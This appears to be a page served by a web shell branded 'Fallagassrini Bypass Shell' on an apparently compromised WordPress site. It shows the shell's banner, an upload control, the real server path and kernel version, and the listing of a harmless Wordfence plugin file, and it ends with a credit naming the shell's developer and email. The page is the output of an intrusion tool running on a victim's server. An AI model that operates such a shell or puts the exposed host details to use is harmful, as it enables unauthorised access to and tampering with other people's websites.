? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/wp-content/plugins/wordfence/views/onboarding/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/wp-content/plugins/wordfence/views/onboarding/overlay.php

<?php
if (!defined('WORDFENCE_VERSION')) { exit; }
/**
 * Presents the overlay.
 *
 * Expects $contentHTML to be defined.
 *
 * @var string $contentHTML The HTML content to show on the overlay.
 */
?>
<div id="wf-onboarding-plugin-overlay">
	<a href="#" id="wf-onboarding-dismiss" role="button">&times;</a>
	<?php echo $contentHTML; ?>
	<script type="application/javascript">
		(function($) {
			$(function() {
				$('#wf-onboarding-dismiss, #wf-onboarding-plugin-overlay').on('click', function(e) {
					e.preventDefault();
					e.stopPropagation();
					
					$(window).trigger('wfOnboardingDismiss');
					$('#wf-onboarding-plugin-overlay').fadeOut(400, function() {
						$('#wf-onboarding-plugin-overlay').remove();
					});
				});

				$(document).keyup(function(e) {
					if (e.keyCode == 27) { //esc
						$('#wf-onboarding-dismiss').trigger('click');
					}
				});
			});
		})(jQuery);
	</script>
</div>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net